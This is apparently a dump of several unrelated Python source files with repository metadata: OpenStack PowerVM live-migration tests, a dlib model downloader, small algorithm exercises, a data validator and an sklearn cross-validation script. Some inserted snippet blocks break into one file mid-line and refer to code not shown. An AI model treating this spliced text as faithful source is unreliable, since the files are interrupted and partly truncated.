network_info=self.network_infos)\n\n self.mig_data = mig_obj.PowerVMLiveMigrateData()\n self.mig_data.host_mig_data = {}\n self.mig_data.dest_ip = '1'\n self.mig_data.dest_user_id = 'neo'\n self.mig_data.dest_sys_name = 'a'\n self.mig_data.public_key = 'PublicKey'\n self.mig_data.dest_proc_compat = 'a,b,c'\n 
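# A minimal sketch of the daily-from-cumulative step in covid_data.py above:
# grouping by the series key before diff() keeps day boundaries from mixing
# across fips codes (toy frame, not the real county/census files):
import pandas as pd

df = pd.DataFrame({
    "fips": ["01001", "01001", "01003", "01003"],
    "date": ["2020-03-01", "2020-03-02", "2020-03-01", "2020-03-02"],
    "cases": [1, 4, 2, 2],
})
df["daily_cases"] = df.groupby("fips")["cases"].diff().fillna(0)
print(df)  # daily_cases per group: 0.0, 3.0 and 0.0, 0.0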
self.mig_data.vol_data = {}\n self.mig_data.vea_vlan_mappings = {}\n\n self.lpmsrc = lpm.LiveMigrationSrc(self.drv, self.inst, self.mig_data)\n self.lpmdst = lpm.LiveMigrationDest(self.drv, self.inst)\n\n self.add_key = self.useFixture(fixtures.MockPatch(\n 'pypowervm.tasks.management_console.add_authorized_key')).mock\n self.get_key = self.useFixture(fixtures.MockPatch(\n 'pypowervm.tasks.management_console.get_public_key')).mock\n self.get_key.return_value = 'PublicKey'\n\n # Short path to the host's migration_data\n self.host_mig_data = self.drv.host_wrapper.migration_data\n\n @mock.patch('pypowervm.tasks.storage.ScrubOrphanStorageForLpar',\n autospec=True)\n @mock.patch('nova_powervm.virt.powervm.media.ConfigDrivePowerVM',\n autospec=True)\n @mock.patch('nova_powervm.virt.powervm.vm.get_instance_wrapper',\n autospec=True)\n @mock.patch('pypowervm.tasks.vterm.close_vterm', autospec=True)\n def test_lpm_source(self, mock_vterm_close, mock_get_wrap,\n mock_cd, mock_scrub):\n self.host_mig_data['active_migrations_supported'] = 4\n self.host_mig_data['active_migrations_in_progress'] = 2\n\n with mock.patch.object(\n self.lpmsrc, '_check_migration_ready', return_value=None):\n\n # Test the bad path first, then patch in values to make succeed\n mock_wrap = mock.Mock(id=123)\n mock_get_wrap.return_value = mock_wrap\n\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc.check_source, 'context',\n 'block_device_info', [])\n\n # Patch the proc compat fields, to get further\n pm = mock.PropertyMock(return_value='b')\n type(mock_wrap).proc_compat_mode = pm\n\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc.check_source, 'context',\n 'block_device_info', [])\n\n pm = mock.PropertyMock(return_value='Not_Migrating')\n type(mock_wrap).migration_state = pm\n\n # Get a volume driver.\n mock_vol_drv = mock.MagicMock()\n\n # Finally, good path.\n self.lpmsrc.check_source('context', 'block_device_info',\n [mock_vol_drv])\n # Ensure we built a scrubber.\n mock_scrub.assert_called_with(mock.ANY, 123)\n # Ensure we added the subtasks to remove the vopts.\n mock_cd.return_value.dlt_vopt.assert_called_once_with(\n mock.ANY, stg_ftsk=mock_scrub.return_value,\n remove_mappings=False)\n # And ensure the scrubber was executed\n mock_scrub.return_value.execute.assert_called_once_with()\n mock_vol_drv.pre_live_migration_on_source.assert_called_once_with(\n {})\n\n # Ensure migration counts are validated\n self.host_mig_data['active_migrations_in_progress'] = 4\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc.check_source, 'context',\n 'block_device_info', [])\n\n # Ensure the vterm was closed\n mock_vterm_close.assert_called_once_with(\n self.apt, mock_wrap.uuid)\n\n def test_lpm_dest(self):\n src_compute_info = {'stats': {'memory_region_size': 1}}\n dst_compute_info = {'stats': {'memory_region_size': 1}}\n\n self.host_mig_data['active_migrations_supported'] = 4\n self.host_mig_data['active_migrations_in_progress'] = 2\n with mock.patch.object(self.drv.host_wrapper, 'refresh') as mock_rfh:\n\n self.lpmdst.check_destination(\n 'context', src_compute_info, dst_compute_info)\n mock_rfh.assert_called_once_with()\n\n # Ensure migration counts are validated\n self.host_mig_data['active_migrations_in_progress'] = 4\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmdst.check_destination, 'context',\n src_compute_info, dst_compute_info)\n # Repair the stat\n self.host_mig_data['active_migrations_in_progress'] = 2\n\n # Ensure diff memory sizes raises an 
exception\n dst_compute_info['stats']['memory_region_size'] = 2\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmdst.check_destination, 'context',\n src_compute_info, dst_compute_info)\n\n @mock.patch('pypowervm.tasks.storage.ComprehensiveScrub', autospec=True)\n @mock.patch('nova_powervm.virt.powervm.vif.'\n 'pre_live_migrate_at_destination', autospec=True)\n def test_pre_live_mig(self, mock_vif_pre, mock_scrub):\n vol_drv = mock.MagicMock()\n network_infos = [{'type': 'pvm_sea'}]\n\n def update_vea_mapping(adapter, host_uuid, instance, network_info,\n vea_vlan_mappings):\n # Make sure what comes in is None, but that we change it.\n self.assertEqual(vea_vlan_mappings, {})\n vea_vlan_mappings['test'] = 'resp'\n\n mock_vif_pre.side_effect = update_vea_mapping\n\n resp = self.lpmdst.pre_live_migration(\n 'context', 'block_device_info', network_infos, 'disk_info',\n self.mig_data, [vol_drv])\n\n # Make sure the pre_live_migrate_at_destination was invoked for the vif\n mock_vif_pre.assert_called_once_with(\n self.drv.adapter, self.drv.host_uuid, self.inst, network_infos[0],\n mock.ANY)\n self.assertEqual({'test': 'resp'}, self.mig_data.vea_vlan_mappings)\n\n # Make sure we get something back, and that the volume driver was\n # invoked.\n self.assertIsNotNone(resp)\n vol_drv.pre_live_migration_on_destination.assert_called_once_with(\n self.mig_data.vol_data)\n self.assertEqual(1, mock_scrub.call_count)\n self.add_key.assert_called_once_with(self.apt, 'PublicKey')\n\n vol_drv.reset_mock()\n raising_vol_drv = mock.Mock()\n raising_vol_drv.pre_live_migration_on_destination.side_effect = (\n Exception('foo'))\n self.assertRaises(\n exception.MigrationPreCheckError, self.lpmdst.pre_live_migration,\n 'context', 'block_device_info', network_infos, 'disk_info',\n self.mig_data, [vol_drv, raising_vol_drv])\n vol_drv.pre_live_migration_on_destination.assert_called_once_with({})\n (raising_vol_drv.pre_live_migration_on_destination.\n assert_called_once_with({}))\n\n def test_src_cleanup(self):\n vol_drv = mock.Mock()\n self.lpmdst.cleanup_volume(vol_drv)\n # Ensure the volume driver is not called\n self.assertEqual(0, vol_drv.cleanup_volume_at_destination.call_count)\n\n def test_src_cleanup_valid(self):\n vol_drv = mock.Mock()\n self.lpmdst.pre_live_vol_data = {'vscsi-vol-id': 'fake_udid'}\n self.lpmdst.cleanup_volume(vol_drv)\n # Ensure the volume driver was called to clean up the volume.\n vol_drv.cleanup_volume_at_destination.assert_called_once()\n\n @mock.patch('pypowervm.tasks.migration.migrate_lpar', autospec=True)\n @mock.patch('nova_powervm.virt.powervm.live_migration.LiveMigrationSrc.'\n '_convert_nl_io_mappings', autospec=True)\n @mock.patch('nova_powervm.virt.powervm.vif.pre_live_migrate_at_source',\n autospec=True)\n def test_live_migration(self, mock_vif_pre_lpm, mock_convert_mappings,\n mock_migr):\n mock_trunk = mock.MagicMock()\n mock_vif_pre_lpm.return_value = [mock_trunk]\n mock_convert_mappings.return_value = ['AABBCCDDEEFF/5']\n\n self.lpmsrc.lpar_w = mock.Mock()\n self.lpmsrc.live_migration('context', self.mig_data)\n mock_migr.assert_called_once_with(\n self.lpmsrc.lpar_w, 'a', sdn_override=True, tgt_mgmt_svr='1',\n tgt_mgmt_usr='neo', validate_only=False,\n virtual_fc_mappings=None, virtual_scsi_mappings=None,\n vlan_check_override=True, vlan_mappings=['AABBCCDDEEFF/5'])\n\n # Network assertions\n mock_vif_pre_lpm.assert_called_once_with(\n self.drv.adapter, self.drv.host_uuid, self.inst, mock.ANY)\n mock_trunk.delete.assert_called_once()\n\n # Test that we raise 
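# The tests above lean on two mock idioms: side_effect to make a patched call
# blow up, and assertRaises to check the error propagates. A self-contained
# sketch with unittest.mock (the file itself uses the standalone mock package,
# which exposes the same API):
import unittest
from unittest import mock

class FailurePathTest(unittest.TestCase):
    def test_error_propagates(self):
        migrate = mock.Mock(side_effect=ValueError('boom'))
        with self.assertRaises(ValueError):
            migrate('lpar-1')
        migrate.assert_called_once_with('lpar-1')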
errors received during migration\n mock_migr.side_effect = ValueError()\n self.assertRaises(ValueError, self.lpmsrc.live_migration, 'context',\n self.mig_data)\n mock_migr.assert_called_with(\n self.lpmsrc.lpar_w, 'a', sdn_override=True, tgt_mgmt_svr='1',\n tgt_mgmt_usr='neo', validate_only=False,\n virtual_fc_mappings=None, virtual_scsi_mappings=None,\n vlan_mappings=['AABBCCDDEEFF/5'], vlan_check_override=True)\n\n def test_convert_nl_io_mappings(self):\n # Test simple None case\n self.assertIsNone(self.lpmsrc._convert_nl_io_mappings(None))\n\n # Do some mappings\n test_mappings = {'aa:bb:cc:dd:ee:ff': 5, 'aa:bb:cc:dd:ee:ee': 126}\n expected = ['AABBCCDDEEFF/5', 'AABBCCDDEEEE/126']\n self.assertEqual(\n set(expected),\n set(self.lpmsrc._convert_nl_io_mappings(test_mappings)))\n\n @mock.patch('pypowervm.tasks.migration.migrate_recover', autospec=True)\n def test_rollback(self, mock_migr):\n self.lpmsrc.lpar_w = mock.Mock()\n\n # Test no need to rollback\n self.lpmsrc.lpar_w.migration_state = 'Not_Migrating'\n self.lpmsrc.rollback_live_migration('context')\n self.assertTrue(self.lpmsrc.lpar_w.refresh.called)\n self.assertFalse(mock_migr.called)\n\n # Test calling the rollback\n self.lpmsrc.lpar_w.reset_mock()\n self.lpmsrc.lpar_w.migration_state = 'Pretend its Migrating'\n self.lpmsrc.rollback_live_migration('context')\n self.assertTrue(self.lpmsrc.lpar_w.refresh.called)\n mock_migr.assert_called_once_with(self.lpmsrc.lpar_w, force=True)\n\n # Test exception from rollback\n mock_migr.reset_mock()\n self.lpmsrc.lpar_w.reset_mock()\n mock_migr.side_effect = ValueError()\n self.lpmsrc.rollback_live_migration('context')\n self.assertTrue(self.lpmsrc.lpar_w.refresh.called)\n mock_migr.assert_called_once_with(self.lpmsrc.lpar_w, force=True)\n\n def test_check_migration_ready(self):\n lpar_w, host_w = mock.Mock(), mock.Mock()\n lpar_w.can_lpm.return_value = (True, None)\n self.lpmsrc._check_migration_ready(lpar_w, host_w)\n lpar_w.can_lpm.assert_called_once_with(host_w, migr_data={})\n\n lpar_w.can_lpm.return_value = (False, 'This is the reason message.')\n self.assertRaises(exception.MigrationPreCheckError,\n self.lpmsrc._check_migration_ready, lpar_w, host_w)\n\n @mock.patch('pypowervm.tasks.migration.migrate_abort', autospec=True)\n def test_migration_abort(self, mock_mig_abort):\n self.lpmsrc.lpar_w = mock.Mock()\n self.lpmsrc.migration_abort()\n mock_mig_abort.assert_called_once_with(self.lpmsrc.lpar_w)\n\n @mock.patch('pypowervm.tasks.migration.migrate_recover', autospec=True)\n def test_migration_recover(self, mock_mig_recover):\n self.lpmsrc.lpar_w = mock.Mock()\n self.lpmsrc.migration_recover()\n mock_mig_recover.assert_called_once_with(\n self.lpmsrc.lpar_w, force=True)\n\n @mock.patch('nova_powervm.virt.powervm.vif.post_live_migrate_at_source',\n autospec=True)\n def test_post_live_migration_at_source(self, mock_vif_post_lpm_at_source):\n network_infos = [{'devname': 'tap-dev1', 'address': 'mac-addr1',\n 'network': {'bridge': 'br-int'}, 'id': 'vif_id_1'},\n {'devname': 'tap-dev2', 'address': 'mac-addr2',\n 'network': {'bridge': 'br-int'}, 'id': 'vif_id_2'}]\n self.lpmsrc.post_live_migration_at_source(network_infos)\n # Assertions\n for network_info in network_infos:\n mock_vif_post_lpm_at_source.assert_any_call(mock.ANY, mock.ANY,\n mock.ANY, network_info)\n\n @mock.patch('nova_powervm.virt.powervm.tasks.storage.SaveBDM.execute',\n autospec=True)\n def test_post_live_migration_at_dest(self, mock_save_bdm):\n bdm1, bdm2, vol_drv1, vol_drv2 = [mock.Mock()] * 4\n vals = [(bdm1, vol_drv1), 
(bdm2, vol_drv2)]\n self.lpmdst.pre_live_vol_data = {'vscsi-vol-id': 'fake_udid',\n 'vscsi-vol-id2': 'fake_udid2'}\n self.lpmdst.post_live_migration_at_destination('network_infos', vals)\n # Assertions\n\n for bdm, vol_drv in vals:\n vol_drv.post_live_migration_at_destination.assert_called_with(\n mock.ANY)\n self.assertEqual(len(vals), mock_save_bdm.call_count)\n","repo_name":"openstack/nova-powervm","sub_path":"nova_powervm/tests/virt/powervm/test_live_migration.py","file_name":"test_live_migration.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"31"} +{"seq_id":"37724143722","text":"import requests\nimport os\nfrom pyunpack import Archive\n\n# The URLs where the models can be downloaded\nurls = [\n \"http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2\",\n \"http://dlib.net/files/dlib_face_recognition_resnet_model_v1.dat.bz2\"\n]\n\nfiles = [\n \"shape_predictor_68_face_landmarks.dat.bz2\",\n \"dlib_face_recognition_resnet_model_v1.dat.bz2\"\n]\n\n# Function to download files\ndef download_file(url):\n response = requests.get(url, stream=True)\n\n # Check if the request was successful\n if response.status_code == 200:\n # The file name is the last part of the URL\n filename = url.split(\"/\")[-1]\n\n # Write the content of the request to a file\n with open(filename, \"wb\") as file:\n file.write(response.content)\n\n print(f\"File {filename} downloaded successfully.\")\n else:\n print(f\"Failed to download file from {url}.\")\n\n# Function to extract files\ndef extract_file(file):\n Archive(file).extractall(\".\")\n print(f\"File {file} extracted successfully.\")\n\n# Check if files exist, if not download and extract them\nfor file, url in zip(files, urls):\n if not os.path.exists(file):\n download_file(url)\n extract_file(file)\n else:\n print(f\"File {file} already exists, skipping download.\")\n","repo_name":"artificialnouveau/face-duration","sub_path":"download_dlib.py","file_name":"download_dlib.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25284461908","text":"# simple solution\n# Time Complexity: O(2N)\n# Space Complexity: O(1)\n\nfrom typing import Optional\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nclass Solution:\n def deleteMiddle(self, head: Optional[ListNode]) -> Optional[ListNode]:\n l = 0\n t_head = head\n while t_head:\n l += 1\n t_head = t_head.next\n res_list = ListNode(0)\n res_list.next = head\n prev = res_list\n curr = head\n \n p = 0\n while curr:\n if p == l//2:\n prev.next = curr.next\n else:\n prev = curr\n curr = curr.next\n p +=1\n return res_list.next","repo_name":"NahidAkhtar84/leet_code_competitive","sub_path":"linked_list/linked_list_delete_middle_node_of_linked_list.py","file_name":"linked_list_delete_middle_node_of_linked_list.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29368914953","text":"# among 40 people, what is the chance that two of them were born on the same day and month?\r\n\r\n# we draw a day of the year from a pool of 365(6) days (day and month)\r\n\r\nfrom random import randint\r\n\r\n# a single experiment\r\n\r\nt = {} # for counting how many times each day occurs\r\nfor i in range(1, 366): t[i] = 0 # <1, 366)\r\n\r\nfor i in range(40):\r\n # day of the year\r\n dr = randint(1,365) # <1,365>\r\n t[dr] = 
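# deleteMiddle above walks the list twice (count, then delete); the usual
# single-pass alternative pairs a slow pointer with a fast one that moves two
# steps at a time, so slow stops just before the middle node:
class Node:
    def __init__(self, val=0, next=None):
        self.val = val
        self.next = next

def delete_middle(head):
    if head is None or head.next is None:
        return None
    slow, fast = head, head.next.next
    while fast and fast.next:
        slow = slow.next
        fast = fast.next.next
    slow.next = slow.next.next  # unlink the middle (index len // 2)
    return head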
t[dr]+1\r\n\r\nok = False\r\nfor i in range(1, 366):\r\n if t[i] > 1: ok = True\r\n\r\nprint(ok)\r\n","repo_name":"ksatola/data-science-postgrad","sub_path":"session02/3_python/PythonEx08.py","file_name":"PythonEx08.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"pl","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"39792715974","text":"#!/usr/bin/env python3\n\nimport logging\n\nfrom squareroot import squareroot\n\nlogging.basicConfig(\n format='%(filename)s:%(funcName)s[%(levelname)s]:%(message)s',\n level=logging.INFO\n)\n\ndef func1(x: int):\n logging.info('Need more power !')\n return x**2\n\nlogging.info('starting')\npower = func1(4)\nroot = squareroot.calculate_square_root(power)\nprint('La racine de {:d} est {:f}'.format(power, root))\nlogging.info('exiting')\n","repo_name":"benjaminrodriguez/s4","sub_path":"cours_python/j2/2_Journalisation/monappli/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43590630307","text":"\"ArticlePage object for ecrans\"\n# -*- coding: utf-8 -*-\n\n# Copyright(C) 2011 Julien Hebert\n#\n# This file is part of weboob.\n#\n# weboob is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# weboob is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with weboob. 
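# main.py above configures the root logger once with basicConfig; a common
# refinement is a named per-module logger, which also captures tracebacks via
# exception() (a small sketch, not taken from the original):
import logging

logging.basicConfig(
    format='%(filename)s:%(funcName)s[%(levelname)s]:%(message)s',
    level=logging.INFO,
)
log = logging.getLogger(__name__)
try:
    1 / 0
except ZeroDivisionError:
    log.exception('division failed')  # logs the message plus the full traceback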
If not, see .\n\nfrom weboob.tools.capabilities.messages.genericArticle import GenericNewsPage, remove_from_selector_list, try_remove_from_selector_list, try_drop_tree, clean_relativ_urls\n\n\nclass ArticlePage(GenericNewsPage):\n \"ArticlePage object for ecrans\"\n def on_loaded(self):\n self.main_div = self.document.getroot()\n self.element_title_selector = \"title\"\n self.element_author_selector = \"p.auteur>a\"\n self.element_body_selector = \"div.bloc_article_01\"\n\n def get_body(self):\n element_body = self.get_element_body()\n remove_from_selector_list(self.parser, element_body, [\"p.auteur\", \"h4\"])\n try_remove_from_selector_list(self.parser, element_body, [\"p.tag\", \"div.alire\", self.element_title_selector, \"h4\"])\n try_drop_tree(self.parser, element_body, \"script\")\n clean_relativ_urls(element_body, \"http://ecrans.fr\")\n\n return self.parser.tostring(element_body)\n","repo_name":"franek/weboob","sub_path":"modules/ecrans/pages/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"11846763276","text":"from functools import lru_cache\n\nfrom cegs_portal.search.models import DNAFeature, DNAFeatureType\n\n\ndef check_genome(ref_genome: str, ref_genome_patch: str):\n if len(ref_genome) == 0:\n raise ValueError(f\"reference genome '{ref_genome}'must not be blank\")\n\n if not ((ref_genome_patch.isascii() and ref_genome_patch.isdigit()) or len(ref_genome_patch) == 0):\n raise ValueError(f\"reference genome patch '{ref_genome_patch}' must be either blank or a series of digits\")\n\n\n@lru_cache(maxsize=1)\ndef get_pos_features(chrom_name, ref_genome):\n return list(\n DNAFeature.objects.filter(\n chrom_name=chrom_name,\n strand=\"+\",\n ref_genome=ref_genome,\n feature_type=DNAFeatureType.GENE,\n )\n .order_by(\"location\")\n .all()\n )\n\n\n@lru_cache(maxsize=1)\ndef get_neg_features(chrom_name, ref_genome):\n return list(\n DNAFeature.objects.filter(\n chrom_name=chrom_name,\n strand=\"-\",\n ref_genome=ref_genome,\n feature_type=DNAFeatureType.GENE,\n )\n .order_by(\"location\")\n .all()\n )\n\n\ndef find_pos_closest(dhs_midpoint, features):\n if len(features) == 0:\n return None\n\n start = 0\n end = len(features)\n index = (end + start) // 2\n while True:\n feature = features[index]\n if index == end or index == start:\n # the loop is hacky, but the binary search only gets _close_ to finding the closest feature.\n for i in range(-6, 7):\n new_feature = features[min(max(0, index + i), len(features) - 1)]\n if abs(new_feature.location.lower - dhs_midpoint) < abs(feature.location.lower - dhs_midpoint):\n feature = new_feature\n return feature\n\n if feature.location.lower >= dhs_midpoint:\n end = index\n elif feature.location.lower < dhs_midpoint:\n start = index\n\n index = (end + start) // 2\n\n\ndef find_neg_closest(dhs_midpoint, features):\n if len(features) == 0:\n return None\n\n start = 0\n end = len(features)\n index = (end + start) // 2\n while True:\n feature = features[index]\n if index == end or index == start:\n # the loop is hacky, but the binary search only gets _close_ to finding the closest feature.\n for i in range(-6, 7):\n new_feature = features[min(max(0, index + i), len(features) - 1)]\n if abs(new_feature.location.upper - dhs_midpoint) < abs(feature.location.upper - dhs_midpoint):\n feature = new_feature\n return feature\n\n if feature.location.upper >= dhs_midpoint:\n end = index\n elif feature.location.upper < 
dhs_midpoint:\n start = index\n\n index = (end + start) // 2\n\n\ndef get_closest_gene(ref_genome, chrom_name, start, end):\n range_midpoint = (start + end) // 2\n closest_pos_feature = find_pos_closest(range_midpoint, get_pos_features(chrom_name, ref_genome))\n\n closest_neg_feature = find_neg_closest(range_midpoint, get_neg_features(chrom_name, ref_genome))\n\n if closest_pos_feature is None and closest_neg_feature is None:\n closest_feature = None\n distance = -1\n gene_name = \"No Gene\"\n elif closest_pos_feature is None:\n closest_feature = closest_neg_feature\n distance = abs(range_midpoint - closest_neg_feature.location.upper)\n elif closest_neg_feature is None or abs(range_midpoint - closest_pos_feature.location.lower) <= abs(\n closest_neg_feature.location.upper - range_midpoint\n ):\n closest_feature = closest_pos_feature\n distance = abs(range_midpoint - closest_pos_feature.location.lower)\n else:\n closest_feature = closest_neg_feature\n distance = abs(closest_neg_feature.location.upper - range_midpoint)\n\n if closest_feature is not None:\n gene_name = closest_feature.name\n\n return closest_feature, distance, gene_name\n","repo_name":"ReddyLab/cegs-portal","sub_path":"scripts/data_loading/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25888377751","text":"\nfrom pxtool.models.output.pxfile.util._px_super import _PxValueByKey\nfrom pxtool.models.output.pxfile.util._px_keytypes import _KeytypeVariableLang, _KeytypeContentLang, _KeytypeVariableValueLang, _KeytypeValuesLangMulti, _KeytypeCodes\n\nfrom pxtool.models.output.pxfile.px_file_model import PXFileModel\nfrom ...validator.validationResult import ValidationResult\nimport pxtool.models.output.pxfile.util.constants as const\nfrom .check_mandatory import check_mandatory\n\n\nclass _Checker:\n def __init__(self, model:PXFileModel) -> None:\n self.val_result = ValidationResult(desc=\"Check if the values found in any subkey are valid. And that values-subkeytype has all variables.\")\n self.error_intro = \"\"\n self.model = model\n\n for keyword_name in const.KEYWORDS_PYTHONIC_MAP:\n keyword = model.get_attribute(const.KEYWORDS_PYTHONIC_MAP[keyword_name])\n if keyword.is_present() and keyword.has_subkey:\n for key in keyword._value_by_key:\n self.error_intro = f\"For keyword {keyword._keyword}\"\n\n if type(key) == _KeytypeContentLang:\n self.check_keytype_content(key, keyword)\n elif isinstance(key, _KeytypeVariableLang): \n self.check_keytype_variable(key, keyword)\n elif isinstance(key, _KeytypeVariableValueLang):\n self.check_keytype_variable_value(key, keyword)\n elif type(key) == _KeytypeValuesLangMulti:\n self.check_keytype_values(key, keyword)\n elif type(key) == _KeytypeCodes:\n #Not valuebased\n pass\n else: # pragma: no cover\n self.val_result.add_error(f\"{self.error_intro}: Sorry, bug in app. Unhandled keytype:{type(key)}. For lang:{key.lang}.\")\n\n def check_keytype_values(self, key:_KeytypeValuesLangMulti, keyword:_PxValueByKey) -> None: \n if not key.values:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Values can not be None. For lang:{key.lang}.\")\n else:\n dimensions = self.model.stub.get_value(key.lang) + self.model.heading.get_value(key.lang)\n if not len(dimensions) == len(key.values):\n self.val_result.add_error(f\"{self.error_intro}: There are {len(dimensions)} dimensions, but {len(key.values)} values. 
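# get_closest_gene above hand-rolls the bisection and then patches it up with
# a +/-6 neighborhood scan; on a plain sorted list of positions the stdlib
# bisect module lands on the insertion point directly, and only the two
# neighbors need comparing (a sketch on toy positions, not the Django models):
import bisect

def closest(positions, target):
    # positions must be sorted and non-empty
    i = bisect.bisect_left(positions, target)
    candidates = positions[max(0, i - 1):i + 1]
    return min(candidates, key=lambda p: abs(p - target))

assert closest([10, 40, 100], 55) == 40
assert closest([10, 40, 100], 500) == 100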
For lang:{key.lang}.\")\n else:\n dimension_cnt=-1\n for value in key.values:\n dimension_cnt += 1\n if value == \"*\":\n continue\n self.check_if_value_in_values(key.lang,dimensions[dimension_cnt],value,self.model)\n\n\n\n\n def check_keytype_variable(self, key:_KeytypeVariableLang, keyword:_PxValueByKey) -> None: \n if not key.variable:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Variable can not be None. For lang:{key.lang}.\")\n else:\n self.check_variable_in_stub_or_heading(key.lang, key.variable, self.model)\n\n def check_keytype_variable_value(self, key:_KeytypeVariableValueLang, keyword:_PxValueByKey) -> None: \n if not key.variable:\n if key.value:\n self.val_result.add_error(f\"{self.error_intro}: Found value, but no variable . For lang:{key.lang}.\")\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Variable can not be None. For lang:{key.lang}.\")\n else:\n if not key.value:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Need value for variable {key.variable}. For lang:{key.lang}.\") \n else:\n if self.check_variable_in_stub_or_heading(key.lang, key.variable, self.model):\n self.check_if_value_in_values(key.lang, key.variable, key.value, self.model) \n\n\n def check_keytype_content(self, key:_KeytypeContentLang, keyword:_PxValueByKey) -> None: \n if not key.content:\n if not keyword.subkey_optional:\n self.val_result.add_error(f\"{self.error_intro}: Content value can not be None. For lang:{key.lang}.\")\n else:\n self.check_if_value_in_values(key.lang, self.model.contvariable.get_value(key.lang), key.content, self.model) \n \n\n def check_if_value_in_values(self, lang:str, dimension:str, value:str, model:PXFileModel) -> bool:\n my_out = value in model.values.get_value(dimension,lang)\n if not my_out :\n self.val_result.add_error(f\"{self.error_intro}: Cannot find item {value} in VALUES for vaiable:{dimension} and lang:{lang}.\")\n return my_out\n\n def check_variable_in_stub_or_heading(self, lang:str, variable:str, model:PXFileModel) -> bool:\n my_out = variable in model.stub.get_value(lang) + model.heading.get_value(lang)\n if not my_out :\n self.val_result.add_error(f\"{self.error_intro}: Cannot find variable {variable} in stub + heading. 
For lang:{lang}.\")\n return my_out\n\n\ndef check_valuebased_subkeys(model:PXFileModel) -> ValidationResult:\n return _Checker(model).val_result","repo_name":"statisticsnorway/pxtool","sub_path":"pxtool/operations_on_model/output/validator/checks/check_subkeys.py","file_name":"check_subkeys.py","file_ext":"py","file_size_in_byte":5462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"32969926579","text":"import sys\nimport pandas as pd\nimport numpy as np\nfrom sklearn import tree\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import precision_recall_fscore_support\n\ndef ave(score):\n sum = 0.00\n for i in score:\n sum += i\n return sum/len(score)\n\ndef crossValidation(cv_data, cv_label, fold_num, clf):\n cv_label = np.array(cv_label)\n total_row_num = len(cv_data)\n offset = int(total_row_num/fold_num)\n precision = 0\n recall = 0\n fscore = 0\n for i in range(fold_num):\n start_index = i*offset\n #print(\"Start_Index: \" + str(start_index))\n end_index = start_index + offset\n #print(\"End_Index: \" + str(end_index))\n test_data = cv_data.iloc[i*offset:i*offset+offset]\n #test_label = cv_label.iloc[i*offset:i*offset+offset]\n test_label = cv_label[i*offset:i*offset+offset]\n train_data_1 = cv_data.iloc[0:i*offset]\n train_data_2 = cv_data.iloc[i*offset+offset:] \n #train_label_1 = cv_label.iloc[0:i*offset]\n #train_label_2 = cv_label.iloc[i*offset+offset:]\n train_label_1 = cv_label[0:i*offset]\n train_label_2 = cv_label[i*offset+offset:]\n train_data = pd.concat([train_data_1, train_data_2])\n #print(len(train_data))\n #train_label = pd.concat([train_label_1, train_label_2])\n train_label = np.append(train_label_1, train_label_2)\n clf.fit(train_data, train_label)\n results = clf.predict(test_data)\n scores = precision_recall_fscore_support(test_label, results, average = 'binary')\n precision += scores[0]\n recall += scores[1]\n fscore += scores[2]\n return [precision/10.00, recall/10.00, fscore/10.00]\n\nI_data = pd.read_csv('I_data_tuned.csv', header=0)\nI_label = pd.read_csv('I_label.csv', header=0)\n\ncolumns = list(I_data.columns.values)\n\n\n# Drop the entire feature one by one\n#I_label = np.array(I_label['gold'])\n\n# Decision Tree\ndtClf = tree.DecisionTreeClassifier()\nprint(\"Decision Tree F-1 score:\")\nprint(crossValidation(I_data, I_label, 10, dtClf))\n\n# Random Forest\nrfClf = RandomForestClassifier(n_estimators=100)\nprint(\"Random Forest F-1 score:\")\nprint(crossValidation(I_data, I_label, 10, rfClf))\n\n# Support Vector Machine\nlsvmClf = svm.SVC(kernel='linear', C=1)\nprint(\"Linear SVM F-1 score:\")\nprint(crossValidation(I_data, I_label, 10, lsvmClf))\n\n# Naive Bayes\ngnbClf = GaussianNB()\nprint(\"Gaussian Naive Bayes score:\")\nprint(crossValidation(I_data, I_label, 10, gnbClf))\n\nbernoulliClf = BernoulliNB()\nprint(\"Bernoulli Naive Bayes score:\")\nprint(crossValidation(I_data, I_label, 10, bernoulliClf))\n\n# Logistic Regression\nl1lrClf = LogisticRegression(penalty='l1', tol=0.01)\nprint(\"L1 Logistic 